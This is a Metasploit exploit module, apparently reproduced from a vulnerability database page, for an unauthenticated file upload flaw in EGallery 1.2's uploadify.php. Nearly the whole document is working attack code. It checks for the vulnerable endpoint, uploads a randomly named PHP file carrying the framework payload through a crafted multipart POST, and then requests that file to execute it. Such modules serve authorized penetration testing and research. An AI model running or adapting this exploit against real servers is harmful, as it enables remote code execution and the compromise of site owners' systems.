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EGallery PHP File Upload Vulnerability

🗓️ 21 Jul 2012 10:14:29Reported by Sammy FORGIT, juan vazquez <[email protected]>Type 
metasploit
 metasploit
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EGallery PHP File Upload Vulnerability in uploadify.php allows unauthenticated arbitrary code executio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in EGallery 1.2 By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/ directory
        without any authentication, which results in arbitrary code execution. The module
        has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['EGallery 1.2', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-07-08',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
        ])
  end

  def check
    uri = target_uri.path

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "egallery", "uploadify.php")
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    boundary = Rex::Text.rand_text_hex(7)

    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    post_data << "#{payload_name}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"
    post_data << "#{uri}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--#{boundary}--\r\n"

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri("#{uri}egallery/uploadify.php"),
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data'   => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("File wasn't uploaded, aborting!")
      return
    end

    print_status("Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}#{payload_name}")
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.  Print the status code for debugging purposes.
    if res and res.code != 200
      print_status("Server returned #{res.code.to_s}")
    end
  end
end

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